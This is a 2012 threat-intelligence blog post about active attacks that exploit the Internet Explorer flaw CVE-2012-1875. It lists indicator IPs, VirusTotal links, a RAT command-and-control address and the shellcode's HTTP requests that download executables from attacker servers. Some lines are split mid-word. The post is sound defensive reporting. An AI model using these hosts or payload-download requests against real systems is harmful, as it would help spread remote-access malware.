Ongoing attacks exploiting CVE-2012-1875

June 13, 2012 | Jaime Blasco
X

Get the latest security news in your inbox.

Subscribe via Email

No thanks. Close this now.

Yesterday, Microsoft released the June 2012 Black Tuesday Update including patches for a vulnerability affecting a wide range versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.

The 0day has been actively exploited as reported by mcafee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

https://otx.alienvault.com/indicator/ip/113.10.241.239/

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

The exploit includes return-oriented programming (ROP) techniques that helps bypassing OS protections.

The shellcode downloads the payload from the following url:

GET /javaw.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)

Host: 113.10.241.239

Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/

A couple of days ago the AV detection rate was 3/41.

Other versions of the exploit have been found in different servers requesting the following payloads:

GET /engli

sh/cala.exe HTTP/1.1 Accept: */

*

Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPa

th.1)

Host: 140.

109.236.143

Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)

Host: www.villagXXXX

Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/

The payloads seems to be RAT (Remote Access Tools).

The C&C server for that RAT is online (ip address 219.90.117.132)

219.90.117.128 - 219.90.117.159

China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we analyze the components involved on this attack.

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
Read more posts from Jaime Blasco ›

‹ BACK TO ALL BLOGS

Watch a Demo ›
GET PRICE FREE TRIAL